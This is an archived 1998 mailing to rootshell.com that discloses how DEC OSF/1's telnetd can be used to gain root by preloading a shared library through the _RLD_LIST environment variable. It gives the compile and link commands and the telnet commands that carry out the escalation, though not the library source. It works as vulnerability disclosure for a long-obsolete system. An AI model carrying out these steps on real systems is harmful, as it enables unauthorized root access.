[ http://www.rootshell.com/ ]

From mc6448@mclink.it Mon Mar 16 11:36:47 1998
Date: Mon, 16 Mar 1998 20:26:05 +0100 (MET)
From: Paolo Rocchi <mc6448@mclink.it>
To: info@rootshell.com
Subject: OSF/1 libroot

I'm referring to CERT Advisory CA-95.14 - original issue date: 11/1/95,
concerning the notorious "Telnetd Environment Vulnerability". As I never
saw detailed information regarding Digital's OSF/1 vulnerability, here
it is.

The telnetd daemon installed under DEC OSF/1 (v2.0 through V3.2c) is
vulnerable to a local root compromise and, if the user is "able to deposit
an altered shared object library onto the targeted system", to a remote
root compromise.

Example codes have been publicly made available for various operating systems.
Starting from those sources it is possible to obtain super-user privileges 
exploiting a particular environment variable.

Details follow:

file.c -> shared object source code (based upon existing examples)

To build the library under DEC OSF/1 V3.2:

cc -c file.c
ld -shared -no_archive -o file.so -set_version osf.1 file.o -lc

telnet> env def _RLD_LIST /tmp/file.so:DEFAULT
telnet> env exp _RLD_LIST
telnet> o localhost

Solution:
See the above-mentioned CERT advisory.

Regards.